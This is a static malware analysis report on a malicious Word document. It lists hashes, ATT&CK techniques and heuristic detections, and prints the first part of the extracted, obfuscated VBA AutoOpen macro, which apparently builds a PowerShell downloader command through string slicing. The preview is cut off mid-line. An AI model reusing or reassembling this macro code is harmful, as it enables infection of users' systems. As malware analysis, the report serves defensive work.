Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bc03c23a46a545ad…

MALICIOUS

Office (OLE)

Size: 163.0 KB
Created: 2018-05-22 15:55:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 358108ec75d54a40b1ad595b47126505
SHA-1: 9f94efabe2e49835eba886d86cf1d952dcf409ed
SHA-256: bc03c23a46a545addd1831e133b74bd2e62eb920041f18a23ec9719ea052e642
Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The AutoOpen macro triggers a Shell() call, which is highly indicative of malicious intent. The script attempts to construct and execute a PowerShell command, likely to download and run a second-stage payload. The ClamAV detection name further supports its malicious nature.

Heuristics (6)

  • ClamAV: Doc.Malware.Valyria-7164735-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-7164735-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • URL http://me6EQddu2Ko: In document text (OLE body)
    • URL http://schemas.openxmlformats.org/drawingml/2006/main: In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 157524 bytes
SHA-256: a8534d081144379ad553bc36a4bb7ddefcd8fbe28ce68cd05f675ffbdeb5c70c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "mfbzzHzQn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ZoJGuSDXL()

On Error Resume Next
wOiTwkh = (jnNziCG - CDbl(661607) + BcDbMXnOVRn + Fix(KVSOitCW / CLng(26661 * Sqr(vjRiR))) - 220471 / Sin(jsNdwbBXX - SFYbTwjwF - 660043 + CLng(NUwSk)) * 353135 * Fix(661607))
lmlVqfNYrG = "Sp8Yebhx4iFdR( xb4ll ((' . 41nXowershei7XbBGRAsxCU6LbuZlT"
dqMiO = Left(Right(lmlVqfNYrG, 26), 7) + CStr(Left(Right(lmlVqfNYrG, 39), 9)) + CStr(Left(Right(lmlVqfNYrG, 44), 3))

fkzDlNhWt = "W6gUJlzJqBHvErbosePTPFf2rPjfUpgIiNMgZx6vT4aEO7HmKcQo5U0GreFeReNce.tosTRt9r0KfQdk7"
VPYjkVcDlQJ = CStr(Left(Right(fkzDlNhWt, 72), 10)) + Left(Right(fkzDlNhWt, 25), 15) + CStr(Left(Right(fkzDlNhWt, 49), 2))

fDLjjk = "4sg()[1,3]zJqAyUcaqEqFnT"
fsCFiU = Left(Right(fDLjjk, 22), 3) + Left(Right(fDLjjk, 19), 5)

wErsM = Chr(43)
kuMDApbiLP = "xPW6ELXlzJqAyUcaqEqFn6EL-J'Pjf"
sZPwaRVOF = Left(Right(kuMDApbiLP, 27), 4) + CStr(Left(Right(kuMDApbiLP, 9), 6))

HnTREWIUo = Chr(43)
zjlGcf = "W6gUJl'Oin6ELaqEqFnT'Ff2rPjfUpgIAFMg6EL) (((67HmKcQ"
NRzBXH = CStr(Left(Right(zjlGcf, 45), 7)) + Left(Right(zjlGcf, 15), 9) + Left(Right(zjlGcf, 31), 1)

cStiXLwrwM = Chr(43)
XJtwKZ = "W6gU'ELLJAyUcaqLqFnTPFf2rPjSnsad6EMgZx6"
KznwZ = CStr(Left(Right(XJtwKZ, 35), 5)) + Left(Right(XJtwKZ, 12), 7) + Left(Right(XJtwKZ, 24), 1)
LGjbWZIJBJp = (OrqGFrof - CDbl(305804) + zHTKZRWwhr + Fix(uBNCLqtd / CLng(62308 * Sqr(QtMOcHijIT))) - 949809 / Sin(kNENwPRw - mLUSPd - 501235 + CLng(dovOzL)) * 911501 * Fix(305804))
GiaPMAfsNww = Chr(43)
fvdoYUs = "xPW6ELalzJqAyUcaqEqsd ='f2r"
WXMPinbwQv = Left(Right(fvdoYUs, 24), 4) + CStr(Left(Right(fvdoYUs, 8), 5))

zQSpXPLuZf = Chr(43)
jzOJiVH = "xPW' &(lzJqAyUcaqEqFnHZp6ELPjf"
LhLjb = Left(Right(jzOJiVH, 27), 4) + CStr(Left(Right(jzOJiVH, 9), 6))

kFUunApoV = Chr(43)
iDBMsN = (bvMQdB - CDbl(114388) + zzjTP + Fix(AtlhhXdc / CLng(313900 * Sqr(qQrWcqO))) - 551279 / Sin(BMCRjs - iPJEfC - 211908 + CLng(DtsKkSTf)) * 764557 * Fix(114388))
PvRFHDa = "xP6ELUJlzJqAyUcnHZpFn"
mnMSHkiil = Left(Right(PvRFHDa, 19), 3) + Left(Right(PvRFHDa, 6), 4)

zdncFOVD = Chr(43)
aAOtbjJ = "xH66gUJlELqA"
AvnopijkU = CStr(Left(Right(aAOtbjJ, 11), 2)) + Left(Right(aAOtbjJ, 4), 2)

JqEJc = Chr(43)
lolcrwn = "xPW6ELZlzJqAyUcaqEqFnpeH6ELPjf"
woQiuv = Left(Right(lolcrwn, 27), 4) + CStr(Left(Right(lolcrwn, 9), 6))

ankEw = Chr(43)
KRJZFZk = (sMBEd - CDbl(400853) + DWwoOijuM + Fix(QfDuiYwCpko / CLng(538850 * Sqr(ofPCpXq))) - 494470 / Sin(zSGtvqjmWQ - QFLJaWpWTO - 541909 + CLng(PtsohTZMpJD)) * 667841 * Fix(400853))
vDsnlhtKK = "46ELZpgUJlzJqAy"
zhBHwz = Left(Right(vDsnlhtKK, 14), 2) + CStr(Left(Right(vDsnlhtKK, 12), 3))

LYwRiQp = Chr(43)
nZNTFRmE = "xPHZpUJlzJqAyUcw6ELFn"
iQfiTHis = Left(Right(nZNTFRmE, 19), 3) + Left(Right(nZNTFRmE, 6), 4)

nfzZlTihEli = Chr(43)
iAcFWbf = "4s6EL-o6ELzJqAyUcaqEqFnT"
zfoAtUPo = Left(Right(iAcFWbf, 22), 3) + Left(Right(iAcFWbf, 19), 5)

oUDFiN = Chr(43)
TSMVf = "xP6ELUJlzJqAyUcb6ELFn"
rYCPoEURz = Left(Right(TSMVf, 19), 3) + Left(Right(TSMVf, 6), 4)

ZEQkdiKwhk = Chr(43)
LWABuKXiKpt = (BcqNwP - CDbl(750670) + jWUGFYXwQvz + Fix(vJnYVdYsIjE / CLng(371613 * Sqr(VAJAdIbhTT))) - 88993 / Sin(XqPuc - MGiNtzAN - 658990 + CLng(VjZWn)) * 985707 * Fix(750670))
nPjzQZJc = "xP6ELUJlzJqAyUcj6ELFn"
uflAo = Left(Right(nPjzQZJc, 19), 3) + Left(Right(nPjzQZJc, 6), 4)

wWrtpzkb = Chr(43)
bSXZLi = "4s6ELecHZpzJqAyUcaqEqFnT"
GhBREHaDH = Left(Right(bSXZLi, 22), 3) + Left(Right(bSXZLi, 19), 5)

VlZGYCHjkkP = Chr(43)
QDQhPF = "xPHZpUJlzJqAyUct6ELFn"
WUdYQ = Left(Right(QDQhPF, 19), 3) + Left(Right(QDQhPF, 6), 4)

XHdBPBT = Chr(43)
FjHbEiRi = "xP6ELUJlzJqAyUcHZp'Fn"
ljlzTc = Left(Right(FjHbEiRi, 19), 3) + Left(Right(FjHbEiRi, 6), 4)

BTqZPSqi = Chr(43)
XnFFrzdK = "x'66gUJlELqA"
AqUCKjn = CStr(Left(Right(XnFFrzdK, 11), 2)) + Left(Right(XnFFrzdK, 4), 2)
nzAwh = (KBYhRwFs - CDbl(619018
... (truncated)